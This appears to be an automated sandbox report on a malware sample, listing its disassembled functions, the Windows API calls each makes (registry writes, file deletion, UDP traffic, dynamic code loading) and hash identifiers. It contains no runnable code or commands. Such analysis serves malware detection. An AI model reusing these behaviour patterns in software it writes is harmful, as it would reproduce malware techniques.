                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e30e9e9d6e81c4a734e14d7790dd11107e741bc6a06cdb0d30b6e8132ebbeef0
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FA313EB5A002149BE724CF64DC54FEAB779EB69700F0086CAF74967254DAF45AC4CF90
                                                                                                                                                                                                                                                                                            Function 01440B9A Relevance: 10.6, APIs: 7, Instructions: 51filestringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,?), ref: 01440BC8
                                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 01440BCE
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?,01433D08,00000000), ref: 01440BE1
                                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 01440BEF
                                                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000020,00000000), ref: 01440C0E
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 01440C2A
                                                                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 01440C37
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$CloseCountCreateDeleteHandleTicklstrcpylstrlenwsprintf
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3232967151-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 3ac693b11ad81004ed77c0d96083307fce225df7bd065debd00ffe46a9294f3a
                                                                                                                                                                                                                                                                                            • Instruction ID: fcde0eb847681d11424369360bc33007204cab095dc8821945752ca0c5f02ef0
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3ac693b11ad81004ed77c0d96083307fce225df7bd065debd00ffe46a9294f3a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA118EB5540208ABDB309B78DC0DBAABB78BB48B05F0045A9B709B2195D6709A468F58
                                                                                                                                                                                                                                                                                            Function 01442E32 Relevance: 9.1, APIs: 6, Instructions: 54registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(00000001,?,00000000,000F003F,?), ref: 01442E52
                                                                                                                                                                                                                                                                                            • RegSetValueExA.KERNEL32(?,00000001,00000000,00000004,00000001,00000004), ref: 01442E6E
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 01442E78
                                                                                                                                                                                                                                                                                            • RegCreateKeyA.ADVAPI32(00000001,?,?), ref: 01442E8C
                                                                                                                                                                                                                                                                                            • RegSetValueExA.KERNEL32(?,00000001,00000000,00000004,00000001,00000004), ref: 01442EA8
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 01442EB2
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseValue$CreateOpen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2738932338-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 2cf8768231368d15410db086bad8d0908e78f16d3dd9cb41804f886d01c93a57
                                                                                                                                                                                                                                                                                            • Instruction ID: b4e434dd664a5190fd4dc2f25f3440e75a5a028b5393f5e7f1e73456bd1291e6
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2cf8768231368d15410db086bad8d0908e78f16d3dd9cb41804f886d01c93a57
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C611FAB9B40208FBDB14DFE4D949FAF7BB8AB48B10F108148FB0597294D670AA04CB60
                                                                                                                                                                                                                                                                                            Function 01434BF9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83registrystringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 01434C2F
                                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 01434CDD
                                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 01434D04
                                                                                                                                                                                                                                                                                            • RegSetValueExA.KERNELBASE(?,?,00000000,00000004,?,00000004), ref: 01434D2E
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?), ref: 01434D3D
                                                                                                                                                                                                                                                                                            • RegSetValueExA.KERNELBASE(?,?,00000000,00000001,?,00000000), ref: 01434D5D
                                                                                                                                                                                                                                                                                            • RegCloseKey.KERNEL32(?), ref: 01434D6F
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Valuelstrcpy$Closelstrlenwsprintf
                                                                                                                                                                                                                                                                                            • String ID: userC:\Windows\
                                                                                                                                                                                                                                                                                            • API String ID: 3050549977-3509716881
                                                                                                                                                                                                                                                                                            • Opcode ID: 649aa8846e6d35bea82277d8ea3f5ed720d31dba54d371df0f297460b15e0899
                                                                                                                                                                                                                                                                                            • Instruction ID: 447d40a28cb0c9661a2513e8ce55ccf164bcd1cde414a3628dc4cda6fe817676
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 649aa8846e6d35bea82277d8ea3f5ed720d31dba54d371df0f297460b15e0899
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 86311974900118AFCB28CF14D89A9D9FB75FB9D701F0885D9E70AAB254D7309AC6CF90
                                                                                                                                                                                                                                                                                            Function 014C7AC0 Relevance: 7.7, APIs: 5, Instructions: 207librarymemoryloaderCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(?), ref: 014C7C02
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,014C4FF9), ref: 014C7C20
                                                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32(?,014C4FF9), ref: 014C7C31
                                                                                                                                                                                                                                                                                            • VirtualProtect.KERNEL32(01410000,00001000,00000004,?,00000000), ref: 014C7C7F
                                                                                                                                                                                                                                                                                            • VirtualProtect.KERNEL32(01410000,00001000), ref: 014C7C94
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1996367037-0
                                                                                                                                                                                                                                                                                            • Opcode ID: dec35c9dfddcf13b3deb57a3b9f576614784eba057bfd1bfffde8799e2a5e16b
                                                                                                                                                                                                                                                                                            • Instruction ID: c5c2bd0037f7633631c2ef260f4b667040c690bdd0289c4a4339009413f502df
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dec35c9dfddcf13b3deb57a3b9f576614784eba057bfd1bfffde8799e2a5e16b
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D5116796542124BD7615ABCCCC02B1BBA4EB41A2A718073EC7E6C73E6F7B458068B60
                                                                                                                                                                                                                                                                                            Function 014384C1 Relevance: 7.6, APIs: 5, Instructions: 134threadnetworkCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • InterlockedIncrement.KERNEL32(014494C8), ref: 01438500
                                                                                                                                                                                                                                                                                            • htons.WS2_32(00000000), ref: 01438559
                                                                                                                                                                                                                                                                                              • Part of subcall function 0143719B: socket.WS2_32(00000002,00000002,00000011), ref: 01437203
                                                                                                                                                                                                                                                                                              • Part of subcall function 0143719B: sendto.WS2_32(?,?,00000000,00000000,00000000,00000010), ref: 0143726D
                                                                                                                                                                                                                                                                                              • Part of subcall function 0143719B: select.WS2_32(?,00000000,00000000,00000000,0000000F), ref: 01437345
                                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 014385C1
                                                                                                                                                                                                                                                                                              • Part of subcall function 0143719B: recvfrom.WS2_32(?,?,00001000,00000000,00000000,00000010), ref: 01437374
                                                                                                                                                                                                                                                                                              • Part of subcall function 0143719B: closesocket.WS2_32(?), ref: 0143750D
                                                                                                                                                                                                                                                                                            • InterlockedDecrement.KERNEL32(014494C8), ref: 014386EA
                                                                                                                                                                                                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 014386F2
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Interlocked$CountDecrementExitIncrementThreadTickUserclosesockethtonsrecvfromselectsendtosocket
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1469894868-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 0a4445615f9498fe3a16407cd3f82d629cd1884d8926f9864adf5b1b5c651cb9
                                                                                                                                                                                                                                                                                            • Instruction ID: cea0592b1a880267c3df9bd56005c43c469d08e4385d934af6b786a22527a017
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a4445615f9498fe3a16407cd3f82d629cd1884d8926f9864adf5b1b5c651cb9
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F15188B4900259CFDB24DF24C890BEAB374BF98304F4086DAE18DA7259D7B19AC4CF51
                                                                                                                                                                                                                                                                                            Function 01441D8F Relevance: 7.6, APIs: 5, Instructions: 72registrysleepCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00000009,?), ref: 01441DD7
                                                                                                                                                                                                                                                                                            • RegEnumValueA.KERNEL32(?,00000000,00000000,00000100,00000000,00000000,00000000,00000000), ref: 01441E14
                                                                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 01441E3D
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000100), ref: 01441E73
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 01441E90
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AttributesCloseEnumFileOpenSleepValue
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 684116133-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 1af97d46e255d67b8fdd55a2d4dec375eecd3bd0cf5754b1511ea3826803ed28
                                                                                                                                                                                                                                                                                            • Instruction ID: 6d80bdeec1e41d104db47ce27f2ea15959cffeea992f3f4536879ea44934dda9
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1af97d46e255d67b8fdd55a2d4dec375eecd3bd0cf5754b1511ea3826803ed28
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 012174B5E00218EBEB31CB64CC45BEAB778AB58B10F1045D9E349A6191D7F06BC4CF90
                                                                                                                                                                                                                                                                                            Function 014427D4 Relevance: 6.1, APIs: 4, Instructions: 103sleepmemorythreadCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00014000), ref: 01442801
                                                                                                                                                                                                                                                                                              • Part of subcall function 0143C89A: MapViewOfFile.KERNEL32(000001D8,00000006,00000000,00000000,00015400), ref: 0143C8D1
                                                                                                                                                                                                                                                                                              • Part of subcall function 0143C89A: UnmapViewOfFile.KERNEL32(00000000), ref: 0143C900
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 01442849
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00002800), ref: 01442924
                                                                                                                                                                                                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 01442947
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileGlobalView$AllocExitFreeSleepThreadUnmapUser
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2983513495-0
                                                                                                                                                                                                                                                                                            • Opcode ID: e26df5e5ebfa0212d8d572bb24ada710902774d919fb1a6d4e2960e9648f8c08
                                                                                                                                                                                                                                                                                            • Instruction ID: 69a58e789c6a059fd8a41c7c805d06c299cad286c68c6733c37ede18f7989eda
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e26df5e5ebfa0212d8d572bb24ada710902774d919fb1a6d4e2960e9648f8c08
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AF31A2B4E00204ABE710DBA5ED45FDEB7B4AB68B60F14422AF511673A4E7F659008B62
                                                                                                                                                                                                                                                                                            Function 01441E9B Relevance: 6.0, APIs: 4, Instructions: 25sleepthreadCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00001000), ref: 01441EA3
                                                                                                                                                                                                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 01441EEA
                                                                                                                                                                                                                                                                                              • Part of subcall function 01441D8F: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00000009,?), ref: 01441DD7
                                                                                                                                                                                                                                                                                              • Part of subcall function 01441D8F: RegEnumValueA.KERNEL32(?,00000000,00000000,00000100,00000000,00000000,00000000,00000000), ref: 01441E14
                                                                                                                                                                                                                                                                                              • Part of subcall function 01441D8F: RegCloseKey.ADVAPI32(?), ref: 01441E90
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00004E20), ref: 01441EC6
                                                                                                                                                                                                                                                                                              • Part of subcall function 01441D8F: GetFileAttributesA.KERNEL32(00000000), ref: 01441E3D
                                                                                                                                                                                                                                                                                              • Part of subcall function 01441D8F: Sleep.KERNEL32(00000100), ref: 01441E73
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00057E40), ref: 01441EE0
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Sleep$AttributesCloseEnumExitFileOpenThreadUserValue
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3734488975-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 819e8b5a65f77ab65b4110d1802958d5bc83e8488021e9fafedbd04c30eb492e
                                                                                                                                                                                                                                                                                            • Instruction ID: b2e0cc51f4639c48f1e13dbb3c7c3796dbcf91b0f33fb6e4afc49aceb4f9847d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 819e8b5a65f77ab65b4110d1802958d5bc83e8488021e9fafedbd04c30eb492e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17E048FDA443045BF22467B1F80AF177619975DF56F044426FB0A852A8DAB3F841C762
                                                                                                                                                                                                                                                                                            Function 014424A1 Relevance: 5.0, APIs: 4, Instructions: 30memoryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 014424BB
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 014424DB
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 014424F3
                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 014424FA
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseHandleHeap$FreeProcess
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4176491614-0
                                                                                                                                                                                                                                                                                            • Opcode ID: beb2e2dd7c8e0058aab859e1b3593f4a50c333ca362d27d97fff1ab24b1ca0de
                                                                                                                                                                                                                                                                                            • Instruction ID: d22b6bb30c4f3c20a5ed63b9a0f75895a24034e9d2cf425b4af61d766fac7b3b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: beb2e2dd7c8e0058aab859e1b3593f4a50c333ca362d27d97fff1ab24b1ca0de
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F3F0EC79D00258CBEB34CFA8D84CBDDB774EB48721F008596EA1992390C7B459D4CF60
                                                                                                                                                                                                                                                                                            Function 01441CE3 Relevance: 4.5, APIs: 3, Instructions: 49stringthreadCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(00000000,01432100), ref: 01441D3C
                                                                                                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(00000000), ref: 01441D55
                                                                                                                                                                                                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 01441D80
                                                                                                                                                                                                                                                                                              • Part of subcall function 01441060: Sleep.KERNEL32(?,?), ref: 014410BF
                                                                                                                                                                                                                                                                                              • Part of subcall function 01441060: lstrcat.KERNEL32(?,01433D20), ref: 014410DD
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: DriveExitSleepThreadTypeUserlstrcatlstrcpy
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3899959655-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 6458deca08ca0ae4feb9dafda89086e9073e22ad418a50ecda3e5ebac5e36687
                                                                                                                                                                                                                                                                                            • Instruction ID: 694a9954d0939b295e3211b020f126c2d438c07345dc6f64e9db898208126fd1
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6458deca08ca0ae4feb9dafda89086e9073e22ad418a50ecda3e5ebac5e36687
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5211D671A402189FEB25CB69CC04BEAB7B9AB5CF00F0000E9F709A7290D7706B40CF91
                                                                                                                                                                                                                                                                                            Function 014341C6 Relevance: 4.5, APIs: 3, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RtlEnterCriticalSection.NTDLL(01449030), ref: 014341D6
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,01441722,00000000), ref: 01434247
                                                                                                                                                                                                                                                                                            • RtlLeaveCriticalSection.NTDLL(01449030), ref: 01434260
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
